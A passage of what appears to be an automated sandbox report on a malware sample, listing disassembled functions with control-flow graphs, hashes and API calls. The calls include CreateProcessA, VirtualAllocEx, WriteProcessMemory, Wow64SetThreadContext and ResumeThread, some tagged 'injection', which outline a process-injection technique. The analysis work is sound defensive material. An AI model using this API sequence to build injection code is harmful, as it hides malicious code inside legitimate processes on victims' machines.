                      • Opcode ID: 2d86d19317cac23fe1486984f2c80853f464fb91c0a66d02bfa73e2df64cb05f
                      • Instruction ID: ea9f40064e2dfa810d12e8540ea002281adaeafa46251fd45afcda59dc2676da
                      • Opcode Fuzzy Hash: 2d86d19317cac23fe1486984f2c80853f464fb91c0a66d02bfa73e2df64cb05f
                      • Instruction Fuzzy Hash: 365189B09007498FDB04DFA9D548BEEBFF1EF49304F248459D109A7250DB385984CB61
                      Function 013BD300 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 317 13bd300-13bd38f GetCurrentProcess 321 13bd398-13bd3cc GetCurrentThread 317->321 322 13bd391-13bd397 317->322 323 13bd3ce-13bd3d4 321->323 324 13bd3d5-13bd409 GetCurrentProcess 321->324 322->321 323->324 326 13bd40b-13bd411 324->326 327 13bd412-13bd42d call 13bd4db 324->327 326->327 330 13bd433-13bd462 GetCurrentThreadId 327->330 331 13bd46b-13bd4cd 330->331 332 13bd464-13bd46a 330->332 332->331
                      APIs
                      • GetCurrentProcess.KERNEL32 ref: 013BD37E
                      • GetCurrentThread.KERNEL32 ref: 013BD3BB
                      • GetCurrentProcess.KERNEL32 ref: 013BD3F8
                      • GetCurrentThreadId.KERNEL32 ref: 013BD451
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2215625375.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_13b0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: Current$ProcessThread
                      • String ID:
                      • API String ID: 2063062207-0
                      • Opcode ID: 4d8f51bff38ccac76a135c2432a32235ff2a19d8ed450f651948d75d6b468dd2
                      • Instruction ID: 02d3ca565a7184104030faaa366a2e82bc9ceb5b3d4afeb2c9e550ff82c0da45
                      • Opcode Fuzzy Hash: 4d8f51bff38ccac76a135c2432a32235ff2a19d8ed450f651948d75d6b468dd2
                      • Instruction Fuzzy Hash: 855157B49016098FDB18DFAAD548BEEBFF1EF48318F248459D109A7350DB385884CB65
                      Function 030539D4 Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 428 30539d4-3053a75 430 3053a77-3053a81 428->430 431 3053aae-3053ace 428->431 430->431 432 3053a83-3053a85 430->432 436 3053b07-3053b36 431->436 437 3053ad0-3053ada 431->437 434 3053a87-3053a91 432->434 435 3053aa8-3053aab 432->435 438 3053a95-3053aa4 434->438 439 3053a93 434->439 435->431 447 3053b6f-3053c29 CreateProcessA 436->447 448 3053b38-3053b42 436->448 437->436 440 3053adc-3053ade 437->440 438->438 441 3053aa6 438->441 439->438 442 3053b01-3053b04 440->442 443 3053ae0-3053aea 440->443 441->435 442->436 445 3053aec 443->445 446 3053aee-3053afd 443->446 445->446 446->446 449 3053aff 446->449 459 3053c32-3053cb8 447->459 460 3053c2b-3053c31 447->460 448->447 450 3053b44-3053b46 448->450 449->442 452 3053b69-3053b6c 450->452 453 3053b48-3053b52 450->453 452->447 454 3053b54 453->454 455 3053b56-3053b65 453->455 454->455 455->455 456 3053b67 455->456 456->452 470 3053cc8-3053ccc 459->470 471 3053cba-3053cbe 459->471 460->459 472 3053cdc-3053ce0 470->472 473 3053cce-3053cd2 470->473 471->470 474 3053cc0 471->474 476 3053cf0-3053cf4 472->476 477 3053ce2-3053ce6 472->477 473->472 475 3053cd4 473->475 474->470 475->472 479 3053d06-3053d0d 476->479 480 3053cf6-3053cfc 476->480 477->476 478 3053ce8 477->478 478->476 481 3053d24 479->481 482 3053d0f-3053d1e 479->482 480->479 483 3053d25 481->483 482->481 483->483
                      APIs
                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 03053C16
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2216939833.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_3050000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: b867b6f15a3652fc09cddcef6381c2081960b19a7f1245e2d166cb97d8bc765e
                      • Instruction ID: 0e9047cb6bd2e4aa0369045f318ded5bc16b866e4554ea2ccf3cfea37ecfb2f5
                      • Opcode Fuzzy Hash: b867b6f15a3652fc09cddcef6381c2081960b19a7f1245e2d166cb97d8bc765e
                      • Instruction Fuzzy Hash: C4915B75D01619DFEB24CF68C841BEEBBF2BF44314F1485A9E808A7240DB759985CF91
                      Function 030539E0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 485 30539e0-3053a75 487 3053a77-3053a81 485->487 488 3053aae-3053ace 485->488 487->488 489 3053a83-3053a85 487->489 493 3053b07-3053b36 488->493 494 3053ad0-3053ada 488->494 491 3053a87-3053a91 489->491 492 3053aa8-3053aab 489->492 495 3053a95-3053aa4 491->495 496 3053a93 491->496 492->488 504 3053b6f-3053c29 CreateProcessA 493->504 505 3053b38-3053b42 493->505 494->493 497 3053adc-3053ade 494->497 495->495 498 3053aa6 495->498 496->495 499 3053b01-3053b04 497->499 500 3053ae0-3053aea 497->500 498->492 499->493 502 3053aec 500->502 503 3053aee-3053afd 500->503 502->503 503->503 506 3053aff 503->506 516 3053c32-3053cb8 504->516 517 3053c2b-3053c31 504->517 505->504 507 3053b44-3053b46 505->507 506->499 509 3053b69-3053b6c 507->509 510 3053b48-3053b52 507->510 509->504 511 3053b54 510->511 512 3053b56-3053b65 510->512 511->512 512->512 513 3053b67 512->513 513->509 527 3053cc8-3053ccc 516->527 528 3053cba-3053cbe 516->528 517->516 529 3053cdc-3053ce0 527->529 530 3053cce-3053cd2 527->530 528->527 531 3053cc0 528->531 533 3053cf0-3053cf4 529->533 534 3053ce2-3053ce6 529->534 530->529 532 3053cd4 530->532 531->527 532->529 536 3053d06-3053d0d 533->536 537 3053cf6-3053cfc 533->537 534->533 535 3053ce8 534->535 535->533 538 3053d24 536->538 539 3053d0f-3053d1e 536->539 537->536 540 3053d25 538->540 539->538 540->540
                      APIs
                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 03053C16
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2216939833.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_3050000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: d75f52d2da30c6607fdc79fb30c709b91915a91ae33107ec467a5c520583f8dc
                      • Instruction ID: 4260fa424418a7a8a28b42772142f7b18f30f9f7cf18d463fb90f8a231e55c13
                      • Opcode Fuzzy Hash: d75f52d2da30c6607fdc79fb30c709b91915a91ae33107ec467a5c520583f8dc
                      • Instruction Fuzzy Hash: 23914975D012199FEB24CF68C841BEEBBF2BF48314F1485A9EC18A7240DB759985CF91
                      Function 013BB070 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 542 13bb070-13bb07f 543 13bb0ab-13bb0af 542->543 544 13bb081-13bb08e call 13baa24 542->544 545 13bb0c3-13bb104 543->545 546 13bb0b1-13bb0bb 543->546 551 13bb090 544->551 552 13bb0a4 544->552 553 13bb111-13bb11f 545->553 554 13bb106-13bb10e 545->554 546->545 598 13bb096 call 13bb2f9 551->598 599 13bb096 call 13bb308 551->599 552->543 555 13bb143-13bb145 553->555 556 13bb121-13bb126 553->556 554->553 558 13bb148-13bb14f 555->558 559 13bb128-13bb12f call 13baa30 556->559 560 13bb131 556->560 557 13bb09c-13bb09e 557->552 561 13bb1e0-13bb2a0 557->561 562 13bb15c-13bb163 558->562 563 13bb151-13bb159 558->563 565 13bb133-13bb141 559->565 560->565 593 13bb2a8-13bb2d3 GetModuleHandleW 561->593 594 13bb2a2-13bb2a5 561->594 566 13bb170-13bb179 call 13baa40 562->566 567 13bb165-13bb16d 562->567 563->562 565->558 573 13bb17b-13bb183 566->573 574 13bb186-13bb18b 566->574 567->566 573->574 575 13bb1a9-13bb1b6 574->575 576 13bb18d-13bb194 574->576 582 13bb1d9-13bb1df 575->582 583 13bb1b8-13bb1d6 575->583 576->575 578 13bb196-13bb1a6 call 13baa50 call 13baa60 576->578 578->575 583->582 595 13bb2dc-13bb2f0 593->595 596 13bb2d5-13bb2db 593->596 594->593 596->595 598->557 599->557
                      APIs
                      • GetModuleHandleW.KERNELBASE(00000000), ref: 013BB2C6
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2215625375.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_13b0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: HandleModule
                      • String ID:
                      • API String ID: 4139908857-0
                      • Opcode ID: 32f316e3082e6d51aa0ec7885b304157261ec4ce21f813d2ac3a7be28567176e
                      • Instruction ID: 8caceb8f5cbddd5eda96bef20d5ae54b7d53af58522520a92712abd6d0dd9404
                      • Opcode Fuzzy Hash: 32f316e3082e6d51aa0ec7885b304157261ec4ce21f813d2ac3a7be28567176e
                      • Instruction Fuzzy Hash: 29716670A00B058FD724DF2AD5807AABBF5FF88304F00892DD54ADBA44EB75E949CB90
                      Function 013B44B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 708 13b44b0-13b59d9 CreateActCtxA 711 13b59db-13b59e1 708->711 712 13b59e2-13b5a3c 708->712 711->712 719 13b5a4b-13b5a4f 712->719 720 13b5a3e-13b5a41 712->720 721 13b5a51-13b5a5d 719->721 722 13b5a60 719->722 720->719 721->722 724 13b5a61 722->724 724->724
                      APIs
                      • CreateActCtxA.KERNEL32(?), ref: 013B59C9
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2215625375.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_13b0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: Create
                      • String ID:
                      • API String ID: 2289755597-0
                      • Opcode ID: bf1dcdc6cf8586069dc28ab76b53694d4cb5bb8710efccea14aed9f97dacd2d4
                      • Instruction ID: 654e5d89c94a9e0a03984e24e277af2340c334e926bc3c3734a84586bbcafc3c
                      • Opcode Fuzzy Hash: bf1dcdc6cf8586069dc28ab76b53694d4cb5bb8710efccea14aed9f97dacd2d4
                      • Instruction Fuzzy Hash: 0041EDB0C0071DCBDB24CFA9C884ADDBBB5BF49308F20806AD508BB255EB756946CF90
                      Function 013B590D Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 725 13b590d-13b59d9 CreateActCtxA 727 13b59db-13b59e1 725->727 728 13b59e2-13b5a3c 725->728 727->728 735 13b5a4b-13b5a4f 728->735 736 13b5a3e-13b5a41 728->736 737 13b5a51-13b5a5d 735->737 738 13b5a60 735->738 736->735 737->738 740 13b5a61 738->740 740->740
                      APIs
                      • CreateActCtxA.KERNEL32(?), ref: 013B59C9
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2215625375.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_13b0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: Create
                      • String ID:
                      • API String ID: 2289755597-0
                      • Opcode ID: cdf3893d1a8c2667e950eee258962eb7a591e01e5bd35d6c1e6f6021dc3584a7
                      • Instruction ID: 005d8855e9910d786bfc10cef73c7909fdcf3d639bfbcb10b4222516bb190b2e
                      • Opcode Fuzzy Hash: cdf3893d1a8c2667e950eee258962eb7a591e01e5bd35d6c1e6f6021dc3584a7
                      • Instruction Fuzzy Hash: 6E41EEB0C00659CFDB25CFA9C885BDDBBB1BF49308F24806AD508BB255DB75694ACF90
                      Function 03053691 Relevance: 1.6, APIs: 1, Instructions: 78memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 741 3053691-3053694 742 3053696-3053713 VirtualAllocEx 741->742 743 305364c-3053684 741->743 748 3053715-305371b 742->748 749 305371c-3053741 742->749 748->749
                      APIs
                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 03053706
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2216939833.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_3050000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: b140e28da616e66f229ee727af9201445ada7e80579e00bb4613ab152c6f1ea0
                      • Instruction ID: 6a119c87d8dd6ce9379af4226adcac40fb681c78dd68b3bd02e5f340e3e38349
                      • Opcode Fuzzy Hash: b140e28da616e66f229ee727af9201445ada7e80579e00bb4613ab152c6f1ea0
                      • Instruction Fuzzy Hash: C5214AB69002099FCB20DFA9D8457EEFFF5EF88320F24841AE519A7250CB399541CFA0
                      Function 03053750 Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 755 3053750-30537a6 757 30537b6-30537f5 WriteProcessMemory 755->757 758 30537a8-30537b4 755->758 760 30537f7-30537fd 757->760 761 30537fe-305382e 757->761 758->757 760->761
                      APIs
                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 030537E8
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2216939833.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_3050000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: MemoryProcessWrite
                      • String ID:
                      • API String ID: 3559483778-0
                      • Opcode ID: 5bd39f4b0c7409ed2ac5597b751413329dc033ccc9421922e978e2709bb81dda
                      • Instruction ID: 3bf5655d2df6abe97405e6a4c2ef6587e42b9fd8af3382d2fd8363c215a8c22f
                      • Opcode Fuzzy Hash: 5bd39f4b0c7409ed2ac5597b751413329dc033ccc9421922e978e2709bb81dda
                      • Instruction Fuzzy Hash: 5E2135B5D002099FCB10CFA9C881BEEBBF1FF48310F10852AE918A7240D7799945CFA0
                      Function 03053758 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 765 3053758-30537a6 767 30537b6-30537f5 WriteProcessMemory 765->767 768 30537a8-30537b4 765->768 770 30537f7-30537fd 767->770 771 30537fe-305382e 767->771 768->767 770->771
                      APIs
                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 030537E8
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2216939833.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_3050000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: MemoryProcessWrite
                      • String ID:
                      • API String ID: 3559483778-0
                      • Opcode ID: 4a73021dd8472ae211d7af40e3e2256751ff0331c0e7b1c27981d24665f9ca85
                      • Instruction ID: 6a306c5a0737989cf56c1f67e5e37ca8dc6ce3766f7c540bd115d61ab81cb358
                      • Opcode Fuzzy Hash: 4a73021dd8472ae211d7af40e3e2256751ff0331c0e7b1c27981d24665f9ca85
                      • Instruction Fuzzy Hash: 802124B5D003099FCB10DFAAC885BEEBBF5FF48310F10842AE919A7240D7789944CBA0
                      Function 030535B9 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                      Download Yara Rule
                      APIs
                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0305363E
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2216939833.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_3050000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: ContextThreadWow64
                      • String ID:
                      • API String ID: 983334009-0
                      • Opcode ID: 6157f3ae2ac3ca46b3f9003b28338db3b0f6601c05182081074936fe230d8872
                      • Instruction ID: 261c7a68aa3cbdcff6f9bba2ae62bae40d9b7b873c61b3a01827a4882958e274
                      • Opcode Fuzzy Hash: 6157f3ae2ac3ca46b3f9003b28338db3b0f6601c05182081074936fe230d8872
                      • Instruction Fuzzy Hash: 522137B5D002098FDB50DFAAC4857EEFBF4EF48324F14842AD959A7240DB78A945CBA0
                      Function 03053841 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                      Download Yara Rule
                      APIs
                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 030538C8
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2216939833.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_3050000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: MemoryProcessRead
                      • String ID:
                      • API String ID: 1726664587-0
                      • Opcode ID: 4094222d0b19edcabbeea1e61581dfec3621e3f3dd94db03e6ceabcc683ff201
                      • Instruction ID: 8f6b3c9d6732bfb88198a45136908f47f0c5099ca95b191523bfb77d47f7b697
                      • Opcode Fuzzy Hash: 4094222d0b19edcabbeea1e61581dfec3621e3f3dd94db03e6ceabcc683ff201
                      • Instruction Fuzzy Hash: 982119B5D012499FCB10DFA9C8417EEFBF5FF48310F10842AE919A7240C7399545DBA0
                      Function 013BD540 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                      Download Yara Rule
                      APIs
                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013BD5CF
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2215625375.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_13b0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: DuplicateHandle
                      • String ID:
                      • API String ID: 3793708945-0
                      • Opcode ID: 3967f81de676e912667d8f892e9042813bba4a4d91e869c3f6b6032a8cb81364
                      • Instruction ID: 2ea9b90387da591e63c4857b8a64b3770d04610d7bfb220ff81f873a453ead0b
                      • Opcode Fuzzy Hash: 3967f81de676e912667d8f892e9042813bba4a4d91e869c3f6b6032a8cb81364
                      • Instruction Fuzzy Hash: 7321F3B58002489FDB10CFAAD584ADEBFF5EB48314F14845AE918A7210D378A945CFA0
                      Function 03053848 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                      Download Yara Rule
                      APIs
                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 030538C8
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2216939833.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_3050000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: MemoryProcessRead
                      • String ID:
                      • API String ID: 1726664587-0
                      • Opcode ID: f9331b9b88622e794880a515e86431ab182b17ec8f18ed66a0d20d057327a8fe
                      • Instruction ID: a8619a30a7464d0cd68c098092a7dc70bd12cf5b165e2d176b766fd3602b1521
                      • Opcode Fuzzy Hash: f9331b9b88622e794880a515e86431ab182b17ec8f18ed66a0d20d057327a8fe
                      • Instruction Fuzzy Hash: F32116B5C003499FCB10DFAAC841AEEFBF5FF48310F108429E919A7240D7389944CBA0
                      Function 030535C0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                      Download Yara Rule
                      APIs
                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0305363E
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2216939833.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_3050000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: ContextThreadWow64
                      • String ID:
                      • API String ID: 983334009-0
                      • Opcode ID: 40450df869f0c585909a452dfc53fa48e0e3b0ea680cb3434882c6802a2a8a42
                      • Instruction ID: ade3d0be8f1fe00bb2e47b019099c8f29174acf8de85a4ed3b9cc86bd039542e
                      • Opcode Fuzzy Hash: 40450df869f0c585909a452dfc53fa48e0e3b0ea680cb3434882c6802a2a8a42
                      • Instruction Fuzzy Hash: 9A2118B5D002098FDB50DFAAC4857EEFBF4EF48314F14842AD919A7240DB789945CFA5
                      Function 013BD548 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                      Download Yara Rule
                      APIs
                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013BD5CF
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2215625375.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_13b0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: DuplicateHandle
                      • String ID:
                      • API String ID: 3793708945-0
                      • Opcode ID: 668b44ff01b16d09bab55ca78498384835096e1dcbaf78e5e98278ae22c50292
                      • Instruction ID: b8230314b7a2d7c94f0890bf199b283138fc0993c919162a008506ed2da37faf
                      • Opcode Fuzzy Hash: 668b44ff01b16d09bab55ca78498384835096e1dcbaf78e5e98278ae22c50292
                      • Instruction Fuzzy Hash: E721C4B59002489FDB10CF9AD584ADEBFF9FB48314F14841AE918A3350D379A944CFA5
                      Function 013BAA88 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,013BB341,00000800,00000000,00000000), ref: 013BB552
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2215625375.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_13b0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      • Opcode ID: c67892a0c71a7093213c963bca297b0d2197f35eaccf8fd9d5bf6b0728e2d9e8
                      • Instruction ID: 20cb726aff7377e7b5b73e03df709d2242ccd7804a3e3a316aafbc25fcd77520
                      • Opcode Fuzzy Hash: c67892a0c71a7093213c963bca297b0d2197f35eaccf8fd9d5bf6b0728e2d9e8
                      • Instruction Fuzzy Hash: 0F1114B68003489FDB10DF9AC484BDEFBF4EB48314F10842AD919A7600D779A545CFA5
                      Function 013BB4E1 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,013BB341,00000800,00000000,00000000), ref: 013BB552
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2215625375.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_13b0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      • Opcode ID: 55c77c12cdc059d9d3f29a337d0dee545a9c1170fff30d3a92495637581dbaef
                      • Instruction ID: ff3d08a4d3235164787f61a927db94da5bcbf042e80a00c282e691d81426f09a
                      • Opcode Fuzzy Hash: 55c77c12cdc059d9d3f29a337d0dee545a9c1170fff30d3a92495637581dbaef
                      • Instruction Fuzzy Hash: 311126B6C003499FDB10CF9AD484BDEFBF4EB88310F10841AD919A7600D779A545CFA1
                      Function 03053698 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                      Download Yara Rule
                      APIs
                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 03053706
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2216939833.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_3050000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: e7316c1df56a6275ff62f6dd7a02d7169766b2a507631c479e8788c7450ee358
                      • Instruction ID: bee84611e9b7c8c55c6ecae91fae71c092bfe691fa6837c6a18a16e8025b8423
                      • Opcode Fuzzy Hash: e7316c1df56a6275ff62f6dd7a02d7169766b2a507631c479e8788c7450ee358
                      • Instruction Fuzzy Hash: 4911F6B59002499FCB20DFAAC845BEFBFF5EF48320F148419E919A7250C779A544CFA1
                      Function 013BB259 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleW.KERNELBASE(00000000), ref: 013BB2C6
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2215625375.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_13b0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: HandleModule
                      • String ID:
                      • API String ID: 4139908857-0
                      • Opcode ID: d997a49291fd729e0071e17f2aceb977cfdeb0b12150cadac77db866342181f4
                      • Instruction ID: 6c21a1290a6b22289da3d06547155cdca078ef18091c7faf119d9a578b8063dd
                      • Opcode Fuzzy Hash: d997a49291fd729e0071e17f2aceb977cfdeb0b12150cadac77db866342181f4
                      • Instruction Fuzzy Hash: 4211FDB6C002498FDB10DF9AD444ADEFBF8AB88224F10841AD928AB610D379A545CFA1
                      Function 03053508 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2216939833.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_3050000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: ResumeThread
                      • String ID:
                      • API String ID: 947044025-0
                      • Opcode ID: 18b61e94d69d8e637e81a1d182d46e277c58642954b765245db8f72f46ce263a
                      • Instruction ID: 2eddd08bbce321577f35cf631dd841c3eeeb78c24a1034e9ecb261727d76dd3b
                      • Opcode Fuzzy Hash: 18b61e94d69d8e637e81a1d182d46e277c58642954b765245db8f72f46ce263a
                      • Instruction Fuzzy Hash: 62116AB5D002088FCB10DFA9C4457EEFBF4EF48310F248459D819A7240D738A940CFA0
                      Function 03053510 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2216939833.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_3050000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: ResumeThread
                      • String ID:
                      • API String ID: 947044025-0
                      • Opcode ID: 287e9946917151b59d2111d7bb47ea97ed84e9f44be0033da3063b23daa2658f
                      • Instruction ID: cd504175e8c6c46548c6ed7193b45bf0eb93a9637dd62b6dd316ec0aff55b619
                      • Opcode Fuzzy Hash: 287e9946917151b59d2111d7bb47ea97ed84e9f44be0033da3063b23daa2658f
                      • Instruction Fuzzy Hash: 841125B5D002488FCB20DFAAC4457AEFBF5EF88324F248419D519A7240CB79A944CBA0
                      Function 013BB260 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleW.KERNELBASE(00000000), ref: 013BB2C6
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2215625375.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_13b0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: HandleModule
                      • String ID:
                      • API String ID: 4139908857-0
                      • Opcode ID: b8c2195b731a6d729d0a24295faa46f847bdaedc214edd3000d6577d6fe13530
                      • Instruction ID: 46cbc14539957acce79d235c5bd7b37cc1042d2e04121deae63f27fd736c9251
                      • Opcode Fuzzy Hash: b8c2195b731a6d729d0a24295faa46f847bdaedc214edd3000d6577d6fe13530
                      • Instruction Fuzzy Hash: 4211DFB5C002498FDB10DF9AD444ADEFBF4AF89324F10851AD929AB610D379A545CFA1
                      Function 03055AC0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                      Download Yara Rule
                      APIs
                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 0305788D
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2216939833.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_3050000_LjGABleGAy.jbxd
                      Similarity
